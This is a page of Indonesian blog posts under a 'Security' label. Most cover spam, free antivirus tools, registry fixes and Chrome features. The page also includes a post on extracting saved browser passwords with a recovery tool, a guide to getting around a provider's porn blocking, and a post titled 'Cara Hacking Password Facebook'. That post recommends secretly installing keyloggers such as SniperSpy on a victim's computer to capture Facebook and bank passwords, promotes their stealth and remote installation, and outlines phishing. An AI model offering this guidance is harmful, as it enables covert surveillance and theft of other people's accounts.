Information Computer And Laptop

The Lates Information Laptop Price List Computer And Tutorial

Tattoo Gallery

Tattoo Artis Design.

Funny

Funny Video and Picture

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Acak-acak - Premiumbloggertemplates.com.

This is default featured post 5 title

The Lates Price of Notebook, Laptop.

Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Monday, July 30, 2012

Cara Recover Password dari Cookies

Mungkin anda mengira cookies adalah kue yang sangat lezat.. hehehee... kalau cookies di komputer bukan kue dan gak bisa di makan.. jadi apakah cookies itu?
Cookies adalah file teks yang ditulis oleh browser client ke dalam komputer client yang berisi informasi yang dikirimkan oleh server. Informasi yang telah dituliskan tersebut selanjutnya dapat dimanfaatkan untuk mengidentifikasikan client, kemudian melakukanhal-hal lain sesuai dengan kebutuhan.
kita bisa mencari password hanya mengandalkan cookies yang tersimpan di komputer  kita
1. Download Multi Password Recovery 1.1.x edisi Portable di SINI
2. Ekstrak file rarnya ke sebuah folder, lalu kita masuk ke folder tempat Multi Password recovery hasil ekstrak tersimpan
3. Jalankan File MPR.exe dengan meng-kliknya dua kali.

Jendela Multi Password Recovery, menampilkan informasi seperti Windows Explorer. Klik Password Audit, maka akan tampil account-account yang lemah. Pada folder Browser, MPR akan menampilkan password yang di peroleh dari hasil catatan Browser.
Sebaiknya anda logout dulu setelah anda  selesai browsing untuk mengihilangkan cookies yang tersimpan di komputer anda
atau jika anda mengunakan browser mozilla fire fox anda dapat menghilangkan cookies yang tersimpan dengan cara klik tools dan pilih clear private data, pastikan pilihan cokies dan offline website data sudah tercontreng, dan pilih clear private data now..
atau menekan ctr + shift + del
dan jika anda menggunakan internet explorere anda dapat menghilagkan cokies dengan cara:
klik tools , pilih internet option baru klik delate cookies

demikian semoga berguna

Relate Post

Tuesday, June 21, 2011

How To Unblock Adult Site From Speedy Provider

Acak-acak does not intend to oppose government programs that block all access to porn sites, but this is just a lesson in how to unblock a site where porn by the provider speedy


For those of you who subscribe to the Internet from the speedy course you can no longer access the sites that smells of porn, whether it be pictures and video, as the telecoms speedy has blocked all access pornography from the Internet, maybe this is very disappointing for those of you who frequently access sites pornographic


how to unblock porn site?

There many ways to unblock sites that have been used to block it in a manner that is
1. using a proxy or webproxy:  using a proxy or webproxy very appropriate to open or to unblock sites that have been in the block, I advise you use a webproxy, because its use is very easy and does not need any special skills. There are many websites that provide free webproxy. you can look for the Google search engine or you can directly click here

   - webproxy.tw :
 how the wearer is not difficult, you just enter the address you want to visit the site to remove clogs and his address Google.com


    - Hide My Ass
  same way as its use webproxy.tw and please enter the site address that you want to open it and click the button hide my ass




2. Using Open DNS Service Google
 services Open dns from google  is dns service to the public by google.  is dns service to the public by google. This services Open DNS  is used freely by everyone, it will not block websites with ip 8.8.8.8 and 8.8.4.4 to use open dns is a bit complicated, but you can follow the following steps

go to control panel == > == Network and Internet Connections > Network Connections

then right-click Local Area Connection, it will look like this





Click the Internet Protocol ( TCP / IP ) then click on Properties




Click on use the following DNS server addresses
and fill in the preferred DNS server to 8.8.8.8
and fill in the Alternate DNS server with 8.8.4.4and click OK


congratulations you have been able to enjoy the Open dns from google and you have overcome and how to unblock porn site you can freely access your site

Relate Post

Saturday, June 18, 2011

Cara Menghidari Email Sampah

Jika Anda tertarik dalam menjalani gaya hidup yang lebih ramah lingkungan, sesuatu di sini yang dapat Anda lakukan yang akan membantu melindungi lingkungan dan menjaga kewarasan Anda: mengurangi jumlah junk mail yang Anda terima sebesar 90 persen.

Menurut informasi dari sumber seperti Pusat untuk American Dream Baru (CNAD)-sebuah organisasi nirlaba yang berbasis di Maryland yang membantu orang mengkonsumsi bertanggung jawab untuk melindungi lingkungan, meningkatkan kualitas hidup, dan mempromosikan keadilan sosial-mengurangi jumlah junk mail Anda terima akan menghemat energi, sumber daya alam, ruang TPA, uang pajak, dan banyak waktu pribadi Anda. Sebagai contoh:

    5,6 juta ton katalog dan iklan surat langsung berakhir di tempat pembuangan sampah AS per tahun.

    Rumah tangga Amerika rata-rata menerima junk mail yang tidak diminta sama dengan 1,5 pohon setiap tahun-lebih dari 100 juta pohon untuk semua rumah tangga AS digabungkan.

    44 persen dari junk mail dibuang belum dibuka, tetapi hanya setengah yang banyak junk mail (22 persen) didaur ulang.

    Amerika membayar $ 370,000,000 setiap tahun untuk membuang junk mail yang tidak mendapatkan daur ulang.

    Rata-rata, Amerika menghabiskan 8 bulan membuka surat sampah dalam perjalanan hidup mereka.

Daftar Nama Anda untuk Mengurangi Junk Mail
OK, sekarang bahwa Anda telah memutuskan untuk mengurangi volume junk mail yang Anda terima, bagaimana Anda pergi tentang itu? Mulailah dengan mendaftar dengan Layanan Preferensi Mail Marketing Association Langsung (DMA). Ini tidak akan menjamin Anda hidup bebas dari junk mail, tetapi bisa membantu. DMA akan daftar Anda di database-nya dalam kategori "Jangan Mail". Pemasar langsung tidak diperlukan untuk memeriksa database, tetapi kebanyakan perusahaan yang mengirimkan volume besar surat massal yang menggunakan layanan DMA. Mereka menyadari tidak ada persentase dalam secara rutin mengirim mail ke orang yang tidak menginginkannya dan telah mengambil tindakan untuk mencegahnya.

Dapatkan Off Daftar Junk Mail
Anda juga bisa pergi ke OptOutPreScreen.com, yang dapat memungkinkan Anda untuk menghapus nama Anda dari daftar yang hipotek, kartu kredit dan perusahaan asuransi digunakan untuk mail yang Anda menawarkan dan permohonan. Ini adalah situs terpusat yang dikelola oleh biro kredit empat besar di Amerika Serikat: Equifax, Experian, Innovis dan TransUnion.

Kebanyakan bisnis cek dengan satu atau lebih dari perusahaan-perusahaan sebelum menerima kartu kredit atau pemberian kredit untuk pembelian jangka panjang. Mereka juga merupakan sumber besar nama dan alamat untuk perusahaan kartu kredit, hipotek dan asuransi yang secara rutin mengirimkan junk mail untuk menarik pelanggan baru dan meminta bisnis baru. Tapi ada cara untuk melawan. UU Pelaporan Kredit federal Fair membutuhkan biro kredit untuk menghapus nama Anda dari daftar mereka menyewa jika Anda membuat permintaan.

Kontak Perusahaan Itu Kirim Anda Junk Mail
Jika Anda serius tentang membersihkan hidup Anda junk mail sebanyak mungkin, maka cukup mendaftar dengan layanan ini mungkin tidak meninggalkan ruang yang cukup di kotak surat Anda. Selain itu, Anda harus meminta semua perusahaan yang Anda merendahkan untuk menempatkan nama Anda pada mereka "tidak mempromosikan" atau "in-house menekan" daftar.

Jika Anda melakukan bisnis dengan sebuah perusahaan melalui pos, harus pada daftar kontak Anda. Itu termasuk penerbit majalah, setiap perusahaan yang mengirimkan katalog, perusahaan kartu kredit, dll terbaik untuk membuat permintaan ini pertama kalinya Anda melakukan bisnis dengan sebuah perusahaan, karena akan mencegah mereka dari menjual nama Anda kepada organisasi lain, tetapi Anda dapat membuat permintaan setiap saat.

Jauhkan Track Nama Anda untuk Melacak Bagaimana Mail Junk Generated
Sebagai tindakan pencegahan ekstra, beberapa organisasi menyarankan Anda melacak di mana perusahaan mendapatkan nama Anda dengan menggunakan nama yang sedikit berbeda setiap kali Anda berlangganan sebuah majalah atau memulai hubungan-mail baru dengan sebuah perusahaan. Salah satu strategi adalah untuk memberikan diri inisial tengah fiksi yang sesuai dengan nama perusahaan. Jika nama Anda adalah Jennifer Jones dan Anda berlangganan Vanity Fair, cukup memberikan nama Anda sebagai Jennifer VF Jones, dan meminta majalah tersebut tidak untuk menyewa nama Anda. Jika Anda pernah menerima sepotong junk mail dari perusahaan lain yang ditujukan kepada Jennifer VF Jones, Anda akan tahu dari mana mereka mendapatkan nama Anda.

Jika ini semua masih tampak sedikit menakutkan, ada sumber daya untuk membantu Anda melalui itu. Salah satu pilihan adalah dengan menggunakan Hentikan Kit Junk Mail dikembangkan oleh Consumer Research Institute. Berbagai situs-situs lain, seperti unsubscribe.com dan stopthejunkmail.com, memberikan bantuan lebih lanjut atau pedoman untuk mengurangi junk mail dan gangguan lainnya, dari e-mail yang tidak diinginkan (spam) untuk panggilan telemarketing. Beberapa dari layanan ini bebas biaya sementara yang lain biaya tahunan.

Jadi jangan dan lingkungan bantuan. Jauhkan junk mail keluar dari kotak surat Anda dan keluar dari TPA.

Relate Post

Saturday, February 5, 2011

Mengaktifkan Folder Option Pada Windows

Folder Option biasanya digunakan untuk melihat dan menyembunyikan file-file yang hidden, banyak virus komputer yang berpotensi yang menghilangkan tools ini, sehingga kita tidak dapat melihat file-file virus yang bersembunyi dalam komputer  kita, tetapi jangan kawatir folder option masih bisa kita aktifkan seperti semua dengan cara
- Start => Run => ketik " regedit" 

kemudian ikuti langkah berikut
HKEY_CURRENT_USER ==> Software ==> Microsoft ==> Windows ==> CurrentVersion ==> Policies ==> Explorer ==> silahkan cek pada pada panel sebelah kanan dengan  Value name NoFolderOption  klik dua kali dan edit value datanya menjadi 0
jika  tidak menenemukan NofolderOption abaikan saja, dan lanjut ketahap berikut

HKEY_LOKAL_MACHINE ==> SOFTWARE ==>Microsoft ==> Windows ==> CurrentVersion ==> Explorer ==> Advanced ==>Folder
nah disini kita agak sedikit repot mencari dan menganti value yang ada, silahkan ikuti langkah-langkah berikut
    * Hidden ==> NOHIDDEN : isi CheckedValue dengan nilai 2 dan DefaultValue dengan nilai 2
    * Hidden ==> SHOWALL:  isi CheckedValue dengan nilai 1 dan DefaultValue dengan nilai 0
    * HideFileExt : isi CheckedValue dengan nilai 0 , pastikan DefaultValue dengan nilai 0, UncheckedValue,dengan nilai 1.
    * SuperHidden : isi CheckedValue dengan nilai 0, DefaultValue dengan nilai 0 dan pada UncheckedValue dengan nilai 1.

Tutup Regedit dan lanjutkan ke langkah berikutnya
kemudian kita menuju  Group Policies
   - Klik start menu ==> Run ==> ketikan : gpedit.msc atau
  
Klik menu User Configuration ==> Administrative Templates ==> Windows Componet ==> Windows Explorer ==> Pada panel sebelah kanan, pilih doble klik “Remove the Folder Option menu item from the tools” ==> tandai not configured ==> apply dan ok

Catatan: apabila tools Run pada windows anda tidak aktif, anda dapat membuka dari command prompt dan mengetik " regedit dan gpedit.msc"
Start ==> Program => accessories => Command Prompt

 

Relate Post

Tuesday, December 14, 2010

New BIOS Virus Which Can Make Your Anti-Virus Useless


Hackers Have once again launched a Root kit Virus which loads directly into the BIOS memory of the computer and makes it prone .

Well BIOS memory loads first then any of the software or even your OS, So the virus is loaded far more first then the antivirus loads. Hence it is a more harmful attack to the computer rather then an other.

Alfredo Ortego and Anibal Sacco of Core Security Technologies say that they have a 100 + line long python code in the memory which loads puts a Root kit in the memory so any antivirus can act on it.
"We tested the system on the most common types of Bios," said Ortega.
"There is the possibility that newer types of Extensible Firmware Interface Bios may be resistant to the attack, but more testing is needed."
The attack vector is also usable against virtual systems, the researchers said. The Bios in VMware is embedded as a module in main VMware executable, and thus could be altered.
"The best approach is preventing the virus from flashing onto the Bios," said Sacco.
"You need to prevent flashing of the bios, even if it means pulling out jumper on motherboard."

Relate Post

Saturday, December 4, 2010

Tips agar Komputer anda Terhindar dari Hacker

Untuk menjadi administrator jaringan memang tidak mudah, banyak masalah jaringan yang harus di cek secara berkala, dan itu sangat memusingkan kepala, apalagi suatu jaringan berhasil di bobol oleh hacker
Lebih menarik dan ironis, pertahanan terbaik melawan mereka berasal dari hacker sendiri


Sementara perusahaan dan organisasi pemerintah di seluruh dunia menghabiskan jumlah besar pada para ahli digunakan dalam hacker keamanan jaringan profesional atau etika komputer,Anda dapat membuat komputer Anda aman menjadi sedikit lebih berhati-hati dan menjaga sistem Anda
  1. Selalu gunakan versi terbaru dari aplikasi perangkat lunak antivirus, atau gunakan  perangkat lunak (software) anti-virus yang terbaik, setiap kali seorang hacker mencoba mengakses mesin atau komputer  anda, Anda akan memperingatkan tentang hal ini sehingga Anda dapat mengambil tindakan yang diperlukan sebelum kerusakan dilakukan.
  2.  Selalu menjaga firewall dalam mode aktif karena akan mencegah masuk secara  tidak sah oleh hacker. yang akan bisa mengambil alih komputer anda 
  3. Memeriksa program yang berjalan pada sistem Anda secara teratur. Jika anda menemukan program yang tidak bisa menginstal atau bukan bagian dari sistem operasi standar, ini mungkin seperti semacam spam 
  4. Untuk meminimalkan resiko terhadap serangan virus dan hacker, Menjaga dan memperbaharui sistem operasi Anda , sebagai memungkinkan mesin untuk diberitahu tentang lubang keamanan terbaru ditemukan, Jika Anda tidak melakukan itu, berarti anda telah mengundangan memberi peluang terbuka untuk hacker 
 Tips ini hanya tindakan yang utama untuk menjaga sistem anda aman dari tangan hacker,Tapi lebih baik untuk mengambil bimbingan para ahli untuk menjaga keamanan komputer anda. dan semoga tips ini juga bermanfaat bagi anda

Relate Post

Thursday, December 2, 2010

86 Persen E-mail di Indonesia Berisi Spam

Berdasarkan laporan terakhir Symantec, spam alias e-mail sampah masih menyumbang sebagian besar lalu lintas internet di Indonesia, yakni 86,61 persen dari keseluruhan e-mail pada bulan Oktober. Persentase ini sedikit lebih kecil ketimbang pada bulan September yang mencapai 89,40 persen.

Meski demikian, kategori spam yang berkaitan dengan leisure meningkat dua kali lipat menjadi 12 persen pada bulan Oktober, dibandingkan 6 persen pada bulan September. Spam-spam itu antara lain soal replika, obat-obatan online, bahkan scam Nigeria tipe 419. Hal ini berdasarkan rilis "Oktober 2010: Analisis Subyek Spam" yang dirilis Symantec.

Sementara itu, e-mail yang mengandung phishing atau jebakan link ke alamat laman internet palsu meningkat 0,3 persen bulan ini, dan terutama disebabkan oleh peningkatan serangan toolkit otomatis. Situs phishing yang dibuat dengan toolkit otomatis meningkat sebesar 41 persen. Namun, URL unik menurun 10 persen.

Situs phishing dengan domain IP (misalnya domain seperti http://255.255.255.255) meningkat drastis sebesar 58 persen. Layanan penyedia web menyumbang sebesar 14 persen dari keseluruhan phishing atau meningkat sebesar 24 persen dari bulan sebelumnya.

Pada Oktober 2010, phishing dalam media sosial menyumbang sekitar 4 persen dari keseluruhan lanskap phishing. Jumlah situs phishing dalam media sosial meningkat secara signifikan sekitar 80 persen dibandingkan bulan sebelumnya.

Seperti pada bulan sebelumnya, mayoritas situs phishing memalsukan dua merek. Phishing dari kedua merek gabungan ini mendekati 98 persen dari keseluruhan phishing dalam media sosial.

Penebar diketahui menggunakan berbagai jenis umpan untuk memikat pengguna agar memberikan informasi pribadi mereka. Pada bulan Oktober, jenis umpan yang biasa digunakan yang teramati adalah situs phishing yang mengklaim berasal dari layanan keamanan merek jejaring sosial. Pengguna diminta untuk memberikan mandat login mereka untuk terus mengakses situs jejaring sosial tersebut.

Relate Post

Waspadai Twitter!

Tidak disangka-sangka, kehadiran microblogging Twitter (twitter.com) yang setiap pesannya terbatas 140 karakter menjadi momok yang menakutkan bagi industri media arus utama (mainstream), baik media cetak, elektronik, maupun online. Mengapa menakutkan?

Alan Rusbridger, kolumnis teknologi Guardian.co.uk, pada 19 November merilis sebuah artikel mengenai 15 alasan mengapa Twitter bisa menjadi masalah bagi organisasi media. Opininya itu tidak dimaksudkan untuk menakut-nakuti pemilik dan pegiat media, tetapi lebih sekadar peringatan semata. Rusbridger justru menyarankan pemilik media berdamai dan tidak harus malu mengadopsi kelebihan Twitter dalam mendistribusikan kontennya.

Bagi warga dunia maya (netizen), Twitter yang mulai online sejak 15 Juli 2006 adalah sebuah keniscayaan. Dengan tekanan waktu dan kesibukan, warga di dunia maya ini tidak lagi ngeblog dengan membuat posting yang panjang lebar. Cukup berkicau seperti burung tentang apa yang terjadi dan menginformasikan peristiwa yang menimpanya atau orang lain, pesan sudah sampai secara berantai.

Twitter yang dikembangkan Jack Dorsey adalah pesan singkat (SMS) virtual yang bekerja di internet. Twitter tidak lebih dari SMS internet. Sebagaimana sebuah pesan singkat, ia dibatasi hanya 140 karakter. Lantas pesan (tweet) apa yang bisa disampaikan para tweep (penyampai tweet) lewat batasan 140 karakter? Bagaimana mungkin industri media bisa terganggu oleh pesan 140 karakter itu?

Sebelum menjawab serenceng pertanyaan ini, baiknya simak terlebih dahulu 15 pikiran Rusbridger mengapa media arus utama perlu mewaspadai Twitter:

1) Distribusi yang mengagumkan. Benar, pesan hanya dibatasi 140 karakter, tetapi di dalamnya tersimpan tautan yang mengantarkan siapa pun ke sebuah situs yang alamat domainnya sudah dipendekkan. Lewat pesan viral-nya, pesan bisa tersebar. Tidak heran setiap situs yang sadar media sosial melengkapi fiturnya dengan ”share on Twitter”.

2) Menempatkan peristiwa lebih dahulu. Meski tidak selalu, banyak berita pertama muncul di Twitter sebelum jurnalis menuliskannya. Bahkan, breaking news bisa langsung diperoleh di Twitter.

3) Sebagai mesin pencari. Twitter adalah saingan Google. Pengguna Twitter yang jumlahnya mendekati angka 200 juta tidak lagi mencari informasi dari Google, tetapi langsung memperolehnya dari jutaan tweet yang mengalir setiap saat.

4) Agregat yang tangguh. Twitter adalah feed berita pribadi sesuai keinginan penggunanya. Tautan tempat berita itu tersimpan bisa langsung dibuka.

5) Bentuk pemasaran yang fantastis. Posting-an yang ditulis di web akan lebih cepat tersebar jika di-share di Twitter karena viral message yang memungkinkan sebuah pesan terus bergulir.

6) Alat reportase yang hebat. Tidak bisa dimungkiri, sekarang banyak wartawan mencari informasi atau ide berita dari Twitter.

7) Rangkaian percakapan. Twitter memungkinkan penggunanya berinteraksi aktif mengenai topik yang dibicarakan.

8) Lebih beragam. Pada media tradisional, hanya segelintir pembaca/pemirsa yang bisa memberikan umpan balik. Di Twitter, setiap orang bisa ”berkicau” sesukanya.

9) Mengubah ”nada” tulisan. Banyak keberanian menulis/bersuara muncul di Twitter. Orang yang semula aktif mendengarkan menjadi aktif berbicara menuangkan gagasan.

10) Hilangnya hierarki lapangan. Tidak semata orang terkenal yang didengar, orang biasa pun memungkinkan berinteraksi secara intens.

11) Memiliki nilai berbeda. Untuk informasi, orang tidak lagi bergantung kepada jurnalis profesional sebab jutaan tweep adalah ”jurnalis” itu sendiri yang siap berbagi informasi.

12) Memiliki rentang perhatian yang panjang. Twitter adalah bentuk ”kesadaran” baru, bahkan dengan menggunakan TweetDeck, pengguna bisa mengatur informasi yang dikehendaki berdasarkan subyek atau pertemanannya.

13) Menciptakan komunitas. Dimungkinkan terbentuknya masyarakat global berdasarkan kepentingan dan minat.

14) Mengubah pengertian tentang kewenangan. Daripada menunggu pendapat pakar yang dimuat/ditayangkan media, Twitter menggeser keseimbangan yang disebut kewenangan ”peer to peer”.

15) Agen perubahan. Isu yang diciptakan akan memengaruhi orang lain atau lembaga pemegang kewenangan. Ini yang disebut sebagai kolaborasi kekuatan media!

Bagi pemilik media massa, khususnya media cetak yang jauh dari kultur web, tidak ada alasan untuk takut karena pembaca media cetak punya kultur sendiri. Akan tetapi, kecenderungan orang mengakses informasi secara cepat harus menjadi pertimbangan. Persoalannya, Twitter menghadirkan kecepatan itu!

Cepat tidak identik dengan tepat. Bagaimana jika Twitter mampu mengadopsi jargon klasik jurnalistik ”get it first, but first get it right”? Ini menjadi persoalan, khususnya bagi media online yang berburu kecepatan, tetapi kadang mengabaikan ketepatan. Kultur Twitter terbentuk secara alamiah sebab tweep cenderung mencari tweet berkualifikasi ”right” selain ”first”. Tweep bukan semata sebagai konsumen penelan informasi, melainkan menjadi produsen yang memberi feed kepada tweep lainnya!

Relate Post

Tuesday, October 26, 2010

Google Chrome Security


While Microsoft essentially is the PC by virtue of its dominance in the operating system and application arenas, Google is just as synonymous with in the Web realm. In fact, Google has evolved well beyond its origins as a Web search engine and has sought to rewrite the rules of engagement and take on Microsoft head-to-head in many areas.

Because Google is a web-based company that designs web-based applications, they decided to develop their own web browser from the ground up to work more efficiently, productively, and securely than with current browsers such as Internet Explorer and Firefox.


Crash Control:
One of the most innovative features of Google Chrome is the sandboxing functionality. Internet Explorer and other browsers run one instance of the browser engine with multiple associated processes. That means that if one or more browser windows or tabs crash or run into issues, it will most likely crash the web browser engine and take down every other instance with it.

Google Chrome runs each instance separately. Malware or issues in one tab can not affect other open browser instances, and the browser is unable to write to or modify the operating system in any way- protecting your PC from attack.
Incognito Surfing:
Maybe you are just private and don't think that details of your web surfing should be retained on your system. Perhaps you are trying to shop for a spouse online and you don't want the search or history data to reveal what you might be shopping for. Whatever your reason, Google Chrome has an Incognito feature which lets you surf the Web with relative anonymity.

The Incognito mode can also be useful when browsing on public systems like library or school PC's. With Incognito the sites you open and files you download are not logged in the browser history and all new cookies are removed when the session closes.
Safe Browsing:
Secure web browsing relies on certificates to verify the authenticity of the server you are connected to. Some attacks can be accomplished though by providing a certificate to convince your browser it is safe, but redirect you to a different, malicious web site.

Google Chrome compares the information provided in the certificate with the actual server being connected to and alerts you if the information doesn't jive. If Chrome detects that the address specified in the certificate and the actual server you connect to are not the same, it issues this warning "'This is probably not the site you are looking for!"
Vulnerabilities and Flaws:
Almost as soon as Google released the public Beta version of the software security researchers began to identify flaws and vulnerabilities. Any new software is typically run through the ringer, but a web browser from the company synonymous with the web gets some extra attention.

Chrome was quickly discovered to be vulnerable to a 'carpet-bombing' flaw originally identified in Apple's Safari browser. A few days later it was found to have a buffer overflow flaw that could also be exploited for malicious attacks.
The Verdict:
While there have been a couple security flaws and vulnerabilities identified, no web browser is perfect and in Google's defense Chrome is still in Beta testing.

Chrome does have a variety of innovative features and a unique interface that many users have quickly come to prfer over Internet Explorer and Firefox. Many users also report that it is faster at loading pages than other web browsers. The additional security controls should prove valuable in helping you surf the Web safely. Google Chrome is definitely worth taking a look at.
Download Google Chrome:
You can download the current version of the Google Chrome web browser here: Download Google Chrome

Relate Post

Software Gratis Block Spam

Software gratis untuk block email spam

Memang sangat menjengkelkan apabila inbox dari email kita dihujani oleh email masuk yang tidak penting atau email Spam, dan biasanya email yang kita tidak kenal tersebut ditebengi oleh virus, atau ada orang yang ingin berbuat kurang baik,
Tetapi jangan kawatir, anda bisa memanfaatkan software gratis untuk mem-block email spam

  1. SpamBayes  SpamBayes ini dirancang dan sangat bekerja baik pada anti spam, dan anda bisa mencoba dengan menggunakan software gratis ini
  2. K9  adalah applikasi software email spam yang bekerja pada POP3 pada program email dan terhubung secara atomatis mengklasifikasikan  pada email masuk seperti email spam atau non-spam  program Ini menggunakan analisis statistik yang smat dan dapat menghasilkan akurasi yang sangat tinggi
  3. MailWasher  sangat bagus dan efektif untuk spam, dan juga  mempunyai kemampuan menghapus virus dari email , sebelum virus sampai dan menginfeksi komputer anda
  4. Spamihilator  sebuah program yang memeriksa Email Anda saat men-download dari server dan menghapus pesan iklan yang tidak diinginkan.Spamihilator kerja antara klien E-Mail Anda dan internet dan memeriksa setiap E-Mail yang masuk tak berguna
    spam mail (Junk) akan disaring keluar
     
Anda dapat mendownload semua software tersebut secara gratis, dan semoga bisa berguna untuk melindungi email dan komputer anda dari email spam ( sampah ) 

Relate Post

Wednesday, September 1, 2010

Anti Virus Terbaik dan Gratis

Untuk melindungi komputer dari virus, trojan, worm dan ancaman yang serupa, Anda harus menggunakan perangkat lunak anti-virus yang berkualitas tinggi. Tidak menggunakan software anti virus berarti Anda membuka peluang bagi virus, yang dapat menyebabkan malware lebih menyerang sistem Anda. 

Pastikan bahwa Anda hanya menginstal satu software anti virus, jika anda menginstal lebih dari satu, sebaliknya akan menyebabkan sistem instability, serta melakukan update secara rutin, agar anti virus anda bisa mendeteksi virus-virus terbaru, karena sering kali kita menginstall anti virus tapi tidak melakukan update secara rutin, maka niscaya anti virus anda tidak bekerja secara maksimal dan komputer anda masih kemungkinan bisa terjangkit oleh virus, malware dan trojan terbaru.


Pertanyaan yang sering diajukan orang :  anti-virus apa yang harus saya gunakan? Banyak dari kita membayar dengan harga mahal Untuk membeli software anti-virus, tapi ini sangat tidak perlu, karena ada banyak software anti-virus yang baik gratis yang menawarkan jenis perlindungan yang sama seperti software yang anda beli , saya memutuskan untuk memberikan daftar 8 anti virus terbaik dan gratis .
  • Avast Home Edition:
    Avast Home Edition
    Download Page cnet.com
    File size 23.1 MB
    Author ALWIL Software
    Operating System Windows All

    Download


    • AVG

    AVG
    Download Page avg.com
    File size 29 MB
    Operating System Windows 2000, XP, XP Pro x64 Edition, Vista, Vista x64 Edition

    Download




    AVIRA ANTIVIR

    AntiVir
    Download Page cnet.com
    File size 23.9 MB
    Operating System Windows 98, Me, NT, 2000, XP, Vista

    Download


    • ClamWin

    ClamWin
    Download Page cnet.com
    File size 5.61MB
    Operating System Windows,2000, 2003, NT, Vista, XP

    Download

    PC Tools
    PC Tools
    Download Page cnet.com
    File size 21.67MB
    Operating System Windows 98/ME/2000/XP

    Download



    • Rising Antivirus

    Rising Antivirus
    Download Page softpedia.com
    File size 60.9 MB
    Operating System Windows All

    Download



    Spyware Terminator
    Spyware Terminator
    Download Page softpedia.com
    File size 631 KB
    Operating System Windows All

    Download


    •  Moon Secure Antivirus
    Moon Secure
    Download Page moonsecure.com
    File size 10.4 MB
    Operating System Windows 95/98/98SE/2000/NT/XP

    Download

    Relate Post

    Tuesday, August 31, 2010

    Cara Hacking Password Facebook


    Facebook adalah jaringan social yang tidak asing lagi bagi kita, dan jaringan social ini telah banyak dipergunakan oleh masyarakat untuk saling berkomunikasi atau berhubungan
    Facebook telah berhasil juga menarik simpati dari para penggunanya karena banyak fitur-fitur , applikasi  game atau permainan yang dapat kita mainkan, seperti  Poker , Mafia war, VarmVille, dan masih banyak lagi
    Banyak teman-teman kita jadi korban para Hacker yang account facebook nya di ambil alih, saya akan menjelaskan cara-cara  bagaimana para pembajak account facebook ini bekerja untuk mendapatkan account anda


    1.    Keylogging:  cara ini adalah cara yang paling gampang dan mudah untuk mendapatkan account anda,  tidak terkecuali hanya account facebook, semua account yang anda login bisa terdetiksi oleh tools ini, keyloger yang biasa disebut dengan mata-mata adalah suatu program yang dipasang atau di install di computer korban, setelah di install program ini akan secara otomatis pada start up dan running pada silent Mode atau berjalan dengan mode yang tidak terlihat, dan akan merekam semua keystroke yang diketik pada computer anda, ada beberapa keylogger yang dilengkapi dengan fitur-fitur  lebih canggih, dimana keylogger tersebut bisa mengambil atau merekan screenshot dan memantau setiap aktifitas yang ada di computer anda.

    Mungkin anda bertanya bahwa computer anda tidak pernah dipergunakan oleh orang lain selain anda sendiri tetapi account facebook anda tetep saja bisa di hack?
    Ada sebagian keyloger yang bisa di hubungkan dengan email, dimana semua rekaman dari computer korban bisa dikirim melalui email, sehingga si pelaku pembajak tidak perlu memantau hasil rekaman keylogger tersebut  dari computer korban, ini bisa dilakukan dari jarak jauh.
    Kecuali computer korban tidak terhubung dengan internet
    Keylogger akan bekerja secara diam-diam sehingga anda tidak merasa curiga bahwa aktifitas anda sedang diamati.

    Peng-installan Program ini tidak perlu membutuhkan skill dan pengetehuan khusus tentang computer, jadi siapa pun yang memiliki pengetahuan dasar tentang computer dapat menggunakan software dan cara ini.

    Bagaimana cara saya mendapatkan keylogger ?
    Saat ini telah banyak keylogger di pasaran, baik gratis ataupun berbayar, tentu disini mempunyai perbedaan atara program gratis dan berbayar, biasanya program berbayar fitur-fitur nya lebih baik dan lebih sempurna dari program yang gratis.
    Tapi jika anda ingin menggunkan program keyloger yang gratis anda boleh buka disini

    Dan jika anda ingin menggunakan keylogger yang berbayar, anda dapat sarankan  menggunakan program SNIPERSPY



    SniperSpy merupakan produk revolusioner yang akan memungkinkan Anda dengan mudah mengakses situs apapun secara online  bahkan password materi yang dilindungi seperti MySpace, Facebook, Yahoo, Gmail dll .Tidak ada keterbatasan  untuk web atau situs apapun dalam menggunakan Tools ini





         Beberapa kelebihan dari Software ini      
    • Access Password Apapun:  Software ini anda dapat mengakses password Facebook dan bahkan password Rekening Bank online pada komputer target, tanpa terkecuali
    • Monitor Setiap Kegiatan dan aktivitas: Anda dapat memantau setiap aktivitas komputer target, mengambil screenshot dan merekam dan percakapan chatting IM
    • Tidak terdeksi: SniperSpy beroperasi dalam mode siluman total dan dengan demikian tetap tidak terdeteksi.Dengan demikian Anda tidak perlu memiliki rasa takut akan dilacak atau tertangkap.
    • Fitur Remote Installation:  Dengan Fitur remote installation, sangat memungkinkan anda dapat menginstall tanpa berada di komputer korban, tanpa berhubugan secara fisik.
    • Sangat Mudah Digunakan: Menginstal dan menggunakan SniperSpy sederhana dan tidak memerlukan keterampilan tambahan 
    • Bekerja pada operating system windows dan Mac: kompatibel dengan Windows 2000/XP/Vista/7 dan Mac. 
              Anda dapat download Sniperspy disini



    2  . Phishing
    Cara umum lainnya untuk hack password atau account online Phishing. Ini adalah teknik yang paling banyak digunakan oleh banyak hacker untuk mendapatkan akses ke Facebook dan situs jaringan sosial lainnya. Metode ini akan menggunakan halaman login palsu (sering disebut sebagai halaman web spoofeed) yang justru mirip dengan yang asli. Katakanlah misalnya halaman web palsu Facebook persis sama dengan halaman asli. Halaman ini sebenarnya dibuat oleh hacker dan di-host di server sendiri.  Setelah korban tak berdosa masuk / password nya sedemikian halaman login palsu, rincian login yang dicuri pergi oleh hacker. Sebagian besar pengguna Internet akan dengan mudah menjadi mangsa penipuan phishing online. Jadi penipuan phishing menipu pengguna sehingga mereka sendiri memberikan password mereka. Namun phishing memerlukan pengetahuan khusus dan keterampilan tingkat tinggi untuk melaksanakan. Dengan demikian, tidak akan mungkin untuk pengguna pemula  mencoba trik ini. Jadi saya akan merekomendasikan penggunaan keyloggers untuk hack Facebook karena merupakan cara termudah dan teraman.

      Relate Post

      Wednesday, June 16, 2010

      Eksploit, Trapdoor, Backdoor, dan Trojan Horse

      1. Eksploit
      Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan
      shell UNIX baru yang baru kamu 'dapatkan'. Dan mungkin sekarang kamu sudah
      mulai bertanya-tanya, "apa sih eksploit (exploit, 'sploits) itu?". Dalam
      konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan artinya
      dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit
      'hacking' lebih spesifik lagi, yang kurang lebih bisa diartikan sebagai
